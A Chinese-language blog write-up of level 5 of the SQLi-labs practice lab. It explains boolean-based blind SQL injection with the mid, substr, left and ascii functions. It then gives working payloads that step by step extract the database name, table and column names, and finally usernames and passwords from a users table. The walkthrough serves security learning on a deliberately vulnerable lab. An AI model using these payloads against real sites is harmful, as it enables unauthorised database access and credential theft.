<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>sqllab-5-bool | 墨水彩笔</title><meta name="author" content="墨水彩笔"><meta name="copyright" content="墨水彩笔"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="一.介绍bool运用：主要介绍三个函数：（下述的函数不仅仅可以单独使用还可以与ascii等函数组合使用）1.mideg：mid(database(),1,1)&#x3D;’a’ 通过&#x3D;右侧字母的改变和表达式的真假判断库名 2.substr与mid用法类似。 用法：substr(string string,num start,num length); string为字符串；start为起始位置；length为">
<meta property="og:type" content="article">
<meta property="og:title" content="sqllab-5-bool">
<meta property="og:url" content="http://example.com/2021/01/23/sql/sqllab-5-bool/index.html">
<meta property="og:site_name" content="墨水彩笔">
<meta property="og:description" content="一.介绍bool运用：主要介绍三个函数：（下述的函数不仅仅可以单独使用还可以与ascii等函数组合使用）1.mideg：mid(database(),1,1)&#x3D;’a’ 通过&#x3D;右侧字母的改变和表达式的真假判断库名 2.substr与mid用法类似。 用法：substr(string string,num start,num length); string为字符串；start为起始位置；length为">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg">
<meta property="article:published_time" content="2021-01-23T02:36:22.000Z">
<meta property="article:modified_time" content="2021-01-23T07:09:33.342Z">
<meta property="article:author" content="墨水彩笔">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2021/01/23/sql/sqllab-5-bool/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2021-01-23 15:09:33'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><meta name="generator" content="Hexo 5.2.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/null" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">81</div></a></div></div></div><hr/></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80-%E4%BB%8B%E7%BB%8Dbool%E8%BF%90%E7%94%A8%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">一.介绍bool运用：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BB%E8%A6%81%E4%BB%8B%E7%BB%8D%E4%B8%89%E4%B8%AA%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">1.0.1.</span> <span class="toc-text">主要介绍三个函数：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%88%E4%B8%8B%E8%BF%B0%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%8D%E4%BB%85%E4%BB%85%E5%8F%AF%E4%BB%A5%E5%8D%95%E7%8B%AC%E4%BD%BF%E7%94%A8%E8%BF%98%E5%8F%AF%E4%BB%A5%E4%B8%8Eascii%E7%AD%89%E5%87%BD%E6%95%B0%E7%BB%84%E5%90%88%E4%BD%BF%E7%94%A8%EF%BC%89"><span class="toc-number">1.0.2.</span> <span class="toc-text">（下述的函数不仅仅可以单独使用还可以与ascii等函数组合使用）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-mid"><span class="toc-number">1.0.2.1.</span> <span class="toc-text">1.mid</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-substr"><span class="toc-number">1.0.2.2.</span> <span class="toc-text">2.substr</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-left"><span class="toc-number">1.0.2.3.</span> <span class="toc-text">3.left</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C-%E7%AC%AC%E4%BA%94%E5%85%B3%EF%BC%88%E4%B8%BB%E8%AE%B2substr%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">二.第五关（主讲substr）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%88%A4%E6%96%AD%E9%97%AD%E5%90%88%E7%AC%A6%E3%80%82%EF%BC%88%E7%9C%8B%E5%85%B6%E4%BB%96%E7%AC%AC%E4%BA%94%E5%85%B3%E6%96%87%E7%AB%A0%EF%BC%89"><span class="toc-number">2.0.1.</span> <span class="toc-text">1.判断闭合符。（看其他第五关文章）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%88%A4%E6%96%AD%E5%AD%97%E7%AC%A6%E6%AE%B5%E3%80%82"><span class="toc-number">2.0.2.</span> <span class="toc-text">2.判断字符段。</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E7%88%86%E5%BA%93%E5%90%8D%EF%BC%9A"><span class="toc-number">2.0.3.</span> <span class="toc-text">3.爆库名：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#A-%E6%B3%95%E4%B8%80%EF%BC%9A"><span class="toc-number">2.0.3.0.1.</span> <span class="toc-text">A.法一：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#B-%E6%B3%95%E4%BA%8C%EF%BC%9A"><span class="toc-number">2.0.3.0.2.</span> <span class="toc-text">B.法二：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#1-%E5%85%88%E5%88%A4%E6%96%AD%E5%BA%93%E5%90%8D%E7%9A%84%E9%95%BF%E5%BA%A6%EF%BC%9A"><span class="toc-number">2.0.3.0.3.</span> <span class="toc-text">1.先判断库名的长度：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-%E7%88%86%E5%BA%93%E5%90%8D%EF%BC%9A"><span class="toc-number">2.0.3.0.4.</span> <span class="toc-text">2.爆库名：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E7%88%86%E8%A1%A8%E5%90%8D%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">4.爆表名：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-%E7%88%86%E5%88%97%E5%90%8D%EF%BC%9A"><span class="toc-number">2.2.</span> <span class="toc-text">5.爆列名：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-%E7%88%86%E6%95%B0%E6%8D%AE%EF%BC%9A"><span class="toc-number">2.3.</span> <span class="toc-text">6.爆数据：</span></a></li></ol></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">墨水彩笔</a></span><span id="menus"><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">sqllab-5-bool</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2021-01-23T02:36:22.000Z" title="Created 2021-01-23 10:36:22">2021-01-23</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2021-01-23T07:09:33.342Z" title="Updated 2021-01-23 15:09:33">2021-01-23</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="一-介绍bool运用："><a href="#一-介绍bool运用：" class="headerlink" title="一.介绍bool运用："></a>一.介绍bool运用：</h1><h3 id="主要介绍三个函数："><a href="#主要介绍三个函数：" class="headerlink" title="主要介绍三个函数："></a>主要介绍三个函数：</h3><h3 id="（下述的函数不仅仅可以单独使用还可以与ascii等函数组合使用）"><a href="#（下述的函数不仅仅可以单独使用还可以与ascii等函数组合使用）" class="headerlink" title="（下述的函数不仅仅可以单独使用还可以与ascii等函数组合使用）"></a>（下述的函数不仅仅可以单独使用还可以与ascii等函数组合使用）</h3><h4 id="1-mid"><a href="#1-mid" class="headerlink" title="1.mid"></a>1.mid</h4><p>eg：mid(database(),1,1)=’a’</p>
<p>通过=右侧字母的改变和表达式的真假判断库名</p>
<h4 id="2-substr"><a href="#2-substr" class="headerlink" title="2.substr"></a>2.substr</h4><p>与mid用法类似。</p>
<p>用法：substr(string string,num start,num length);</p>
<p>string为字符串；start为起始位置；length为长度。</p>
<p>注意：mysql中的start是从1开始的。</p>
<p>eg：substr(database(),1,1)=’a’</p>
<p>通过=右侧字母的改变和表达式的真假判断库名。</p>
<h4 id="3-left"><a href="#3-left" class="headerlink" title="3.left"></a>3.left</h4><p>此函数用法：left(a,b)</p>
<p>从左侧截取 a 的前 b 位</p>
<p>例：left(database(),1)=’a’</p>
<p>通过=右侧字母的改变和表达式的真假判断库名。</p>
<h1 id="二-第五关（主讲substr）"><a href="#二-第五关（主讲substr）" class="headerlink" title="二.第五关（主讲substr）"></a>二.第五关（主讲substr）</h1><h3 id="1-判断闭合符。（看其他第五关文章）"><a href="#1-判断闭合符。（看其他第五关文章）" class="headerlink" title="1.判断闭合符。（看其他第五关文章）"></a>1.判断闭合符。（看其他第五关文章）</h3><h3 id="2-判断字符段。"><a href="#2-判断字符段。" class="headerlink" title="2.判断字符段。"></a>2.判断字符段。</h3><h3 id="3-爆库名："><a href="#3-爆库名：" class="headerlink" title="3.爆库名："></a>3.爆库名：</h3><h5 id="A-法一："><a href="#A-法一：" class="headerlink" title="A.法一："></a>A.法一：</h5><p>单独使用substr函数</p>
<p>直接盲猜eg:    <strong>?id=1’ and substr(database(),1,1)=’s’ –+</strong>(不推荐使用，太莽了，且最致命的是不知道库名的长度，注意：当某个位置的字符的ascii等于0，说明此处已经没有字母了）</p>
<p>通过判断是否正确来判断库名的第x个字母。（请看上述substr函数的介绍）</p>
<h5 id="B-法二："><a href="#B-法二：" class="headerlink" title="B.法二："></a>B.法二：</h5><p>组合使用ascii和substr。</p>
<h5 id="1-先判断库名的长度："><a href="#1-先判断库名的长度：" class="headerlink" title="1.先判断库名的长度："></a>1.先判断库名的长度：</h5><p><strong>?id=1’ and length(database())&gt;7–+</strong></p>
<p>这里&gt;后面的数字叠加来推断，当变为8时报错，因此库名长度为7.</p>
<h5 id="2-爆库名："><a href="#2-爆库名：" class="headerlink" title="2.爆库名："></a>2.爆库名：</h5><p><strong>?id=1’ and ascii(substr(database(),1,1))&gt;115–+</strong></p>
<p>类似的判断，请结合ascii表。</p>
<p>注释：可以使用<strong>二分法</strong>来提高效率。</p>
<h2 id="4-爆表名："><a href="#4-爆表名：" class="headerlink" title="4.爆表名："></a>4.爆表名：</h2><p><strong>?id=1’and ascii(substring((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))&gt;0–+</strong></p>
<p>注释：这里的limit 0,1表示的是库中的第一个表，而后面的1,1为substr函数的结构。</p>
<h2 id="5-爆列名："><a href="#5-爆列名：" class="headerlink" title="5.爆列名："></a>5.爆列名：</h2><p><strong>?id=1’and ascii(substring((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’limit 0,1),1,1))&gt;0 –+</strong></p>
<h2 id="6-爆数据："><a href="#6-爆数据：" class="headerlink" title="6.爆数据："></a>6.爆数据：</h2><p><strong>?id=1’and ascii(substring((select id from users limit 0,1),1,1))&gt;0–+<br>?id=1’and ascii(substring((select password from users limit 0,1),1,1))&gt;0–+<br>?id=1’and ascii(substring((select username from users limit 0,1),1,1))&gt;0–+</strong></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">墨水彩笔</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2021/01/23/sql/sqllab-5-bool/">http://example.com/2021/01/23/sql/sqllab-5-bool/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2021/01/23/sql/sqllab-2-3-4-1/"><img class="prev-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">sqllab-2.3.4</div></div></a></div><div class="next-post pull-right"><a href="/2021/01/21/sql/sqllab-5-floor/"><img class="next-cover" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/img/default.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">sqllab-5-floor</div></div></a></div></nav></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By 墨水彩笔</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>